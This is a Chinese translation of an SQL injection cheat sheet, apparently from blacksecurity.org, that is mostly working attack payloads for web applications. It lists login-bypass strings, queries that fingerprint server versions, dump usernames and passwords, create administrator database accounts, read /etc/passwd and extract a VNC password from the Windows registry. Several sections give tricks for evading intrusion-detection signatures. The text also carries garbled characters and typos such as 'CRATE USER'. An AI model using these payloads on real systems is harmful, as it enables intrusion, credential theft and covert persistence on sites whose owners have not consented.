作者: zeroday
組織: blacksecurity.org
翻譯:漂浮的塵埃[S.S.T]
1. 介紹
2. 漏洞測試
3. 收集信息
4. 數(shù)據(jù)類型
5. 獲取密碼
6. 創(chuàng)建數(shù)據(jù)庫賬號
7. MYSQL操作系統(tǒng)交互作用
8. 服務(wù)器名字與配置
9. 從注冊表中獲取VNC密碼
10.逃避標(biāo)識部分信號
11.用Char()進(jìn)行MYSQL輸入確認(rèn)欺騙
12.用注釋逃避標(biāo)識部分信號
13.沒有引號的字符串
1. 當(dāng)服務(wù)器只開了80端口,我們幾乎肯定管理員會為服務(wù)器打補(bǔ)丁���。
最好的方法就是轉(zhuǎn)到網(wǎng)站攻擊��。SQL注射是最普遍的網(wǎng)站攻擊方法之一����。
你攻擊網(wǎng)站程序�,(ASP,JSP,PHP,CGI..)比服務(wù)器或者在服務(wù)器上運(yùn)行的操作系統(tǒng)好的多。
SQL注射是一種通過網(wǎng)頁輸入一個查詢命令或者一條指令進(jìn)行欺騙的方法�����,很多站點(diǎn)都是從用戶的用戶名����,密碼甚至email獲取用戶的參數(shù)�。
他們都使用SQL查詢命令��。
2. 首先你用簡單的進(jìn)行嘗試��。
- Login:' or 1=1--
- Pass:' or 1=1--
- http://website/index.asp?id=' or 1=1--
這些是簡單的方法�����,其他如下:
- ' having 1=1--
- ' group by userid having 1=1--
- ' Select name FROM syscolumns Where id = (Select id FROM sysobjects Where name = 'tablename')--
- ' union select sum(columnname) from tablename--
3.收集信息
- ' or 1 in (select @@version)--
- ' union all select @@version-- /*這個優(yōu)秀
這些能找到計(jì)算機(jī)�,操作系統(tǒng),補(bǔ)丁的真實(shí)版本���。
4.?dāng)?shù)據(jù)類型
oracle 擴(kuò)展
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL 數(shù)據(jù)庫�, C:\WINDOWS>type my.ini得到root密碼
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
5.獲取密碼
';begin declare @var varchar(8000) set @var=':' select
@var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
6.創(chuàng)建數(shù)據(jù)庫賬號
10. MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin' 加為數(shù)據(jù)庫管理員
MySQL
Insert INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
7. MYSQL操作系統(tǒng)交互作用
- ' union select 1,load_file('/etc/passwd'),1,1,1; 這里用到load_file()函數(shù)
8.服務(wù)器名字與配置
- ' and 1 in (select @@servername)--
- ' and 1 in (select servername from master.sysservers)--
9.從注冊表中獲取VNC密碼
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default', /*VNC4路徑略有不同
- @value_name='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
10.逃避標(biāo)識部分信號
Evading ' or 1=1 Signature
- ' or 'unusual' = 'unusual'
- ' or 'something' = 'some'+'thing'
- ' or 'text' = N'text'
- ' or 'something' like 'some%'
- ' or 2 > 1
- ' or 'text' > 't'
- ' or 'whatever' in ('whatever')
- ' or 2 BETWEEN 1 and 3
11.用Char()進(jìn)行MYSQL輸入確認(rèn)欺騙
不用引號注射(string = "%")
--> ' or username like char(37);
用引號注射(string="root"):
è ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->'unionselect 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
12. 用注釋逃避標(biāo)識部分信號
-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
13.沒有引號的字符串
--> Insert INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)
